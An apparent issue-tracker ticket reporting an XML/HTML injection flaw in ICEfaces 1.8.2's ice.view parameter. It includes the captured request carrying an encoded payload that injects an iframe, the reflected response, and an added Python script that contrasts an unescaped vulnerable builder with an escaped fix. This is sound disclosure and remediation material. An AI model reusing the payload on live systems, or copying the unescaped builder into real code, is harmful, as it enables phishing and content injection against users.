Details
- Type: Bug
- Status: Closed
- Priority: Major
- Resolution: Fixed
- Affects Version/s: 1.8.2
- Fix Version/s: 1.8.2-EE-GA_P01
- Component/s: Framework
- Labels: None
- Environment: software, vulnerable
Description
Vulnerable URL: /block/send-receive-updates (Parameter: ice.view)
• Set the value of parameter 'ice.view' to '1"/>%3cabc+xmlns%3axyz%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3cxyz%3aiframe+src%3d'http%3a%2f%2fdemo.testfire.net'%2f%3e%3c%2fabc%3e'
Request/Response:
POST /*****/block/send-receive-updates HTTP/1.0
Cookie: ice.lease=1335473860010; updates=; ice.sessions=xu6YNrhn5dhlK6y1l2Gfig#1; JSESSIONID=kChDPZ2CR1ghQyz02JqY1PTtXhGzT9Th81Qf87GNW2H2TZ3G8MRj!-979418690
Content-Length: 541
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: ********:****
Content-Type: application/x-www-form-urlencoded
Referer: http://*****:****/*****/Login.iface

ice.submit.partial=false&ice.event.target=form1&ice.event.captured=null&ice.event.type=onsubmit&form1=form1&icefacesCssUpdates=&javax.faces.ViewState=1&javax.faces.RenderKitId=ICEfacesRenderKit&form1%3AuserName=&form1%3Ainputsecret=1234&form1%3AmessageForSecurityCode=This+function+is+disabled+for+security&ice.session=xu6YNrhn5dhlK6y1l2Gfig&ice.view=1"/>%3cabc+xmlns%3axyz%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3cxyz%3aiframe+src%3d'http%3a%2f%2fdemo.testfire.net'%2f%3e%3c%2fabc%3e&ice.focus=undefined&rand=0.7472490528598428%0A%0A

HTTP/1.1 200 OK
Content-Length: 119
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate
Connection: close
Date: Thu, 26 Apr 2012 21:11:19 GMT
Pragma: no-cache
Content-Type: text/xml; charset=UTF-8
Expires: 0
X-Powered-By: Servlet/2.5 JSP/2.1

<reload view="1"/><abc xmlns:xyz='http://www.w3.org/1999/xhtml'><xyz:iframe src='http://demo.testfire.net'/></abc>"/>
Validation In Response:
• <reload view="1"/><abc xmlns:xyz='http://www.w3.org/1999/xhtml'><xyz:iframe src='http://demo.testfire.net'/></abc>"/>
Reasoning:
The test response contained a link to the URL "http://demo.testfire.net", which proves that the phishing attempt was successful.
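The response above shows why the finding works: the ice.view value is copied into the view attribute of the <reload/> update with no XML attribute encoding, so the quote and "/>" at the start of the value close the element early and the rest of the value is delivered to the client as sibling elements, among them an XHTML iframe. The script below is an added illustration, not ICEfaces code (ICEfaces itself is Java; Python is used here only to keep the check short). It takes the ice.view value exactly as it appears in the ticket's request body, decodes it the way a servlet container would, builds the update both ways (the unescaped concatenation the ticket's response reflects, and the same update emitted through XML attribute escaping), then parses each result as a client-side XML parser would. The helper names, the constructed <updates> wrapper root, and the two builder functions are assumptions of this example, not names from the ICEfaces code base.

```python
"""Reflected value in an XML attribute, rebuilt from the ticket and checked both ways.

Added illustration, not ICEfaces code. It reuses the ice.view value from the
ticket's request, decodes it as the server would, and builds the <reload/>
update two ways: pasted in verbatim (the response shown in the ticket) and
emitted through XML attribute escaping.
"""
from urllib.parse import unquote_plus
from xml.sax.saxutils import quoteattr
import xml.etree.ElementTree as ET

# Form-encoded ice.view value exactly as it appears in the ticket's request body.
RAW_ICE_VIEW = (
    "1\"/>%3cabc+xmlns%3axyz%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'"
    "%3e%3cxyz%3aiframe+src%3d'http%3a%2f%2fdemo.testfire.net'%2f%3e%3c%2fabc%3e"
)
# What the servlet container hands the application after form decoding.
DECODED_ICE_VIEW = unquote_plus(RAW_ICE_VIEW)


def vulnerable_reload(view: str) -> str:
    """Update built by string concatenation: the value lands inside the attribute unchanged.

    This reproduces the shape of the response captured in the ticket (assumed
    construction, not the project's actual rendering code).
    """
    return '<reload view="' + view + '"/>'


def hardened_reload(view: str) -> str:
    """Same update, but the value goes through XML attribute escaping.

    quoteattr() replaces &, <, > with entities and, because this input holds both
    quote characters, also turns " into &quot; before wrapping the value in quotes.
    """
    return "<reload view=" + quoteattr(view) + "/>"


def element_names(update: str) -> list:
    """Parse the update as a client-side XML parser would and list every element it sees.

    The fragment is wrapped in a constructed <updates> root so that several
    top-level elements still parse; the wrapper itself is left out of the result.
    Namespaced tags come back in ElementTree's {uri}local form.
    """
    root = ET.fromstring("<updates>" + update + "</updates>")
    return [el.tag for el in root.iter()][1:]


def reload_view(update: str) -> str:
    """Return the view attribute of the first <reload/> element in the update."""
    root = ET.fromstring("<updates>" + update + "</updates>")
    return root.find("reload").get("view")


if __name__ == "__main__":
    for label, build in (("unescaped", vulnerable_reload), ("escaped", hardened_reload)):
        update = build(DECODED_ICE_VIEW)
        print(label, "->", element_names(update))
        print("   view attribute:", reload_view(update))
```

With the unescaped builder the parsed update contains three elements, reload, abc and the namespaced iframe, and the view attribute is just "1"; with attribute escaping the parser sees a single reload element whose view attribute round-trips the entire submitted string as data. Rejecting ice.view values that are not the expected identifier format before rendering would be a second, independent layer on top of the encoding.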
Activity
May be fixed by http://jira.icesoft.org/browse/ICE-5181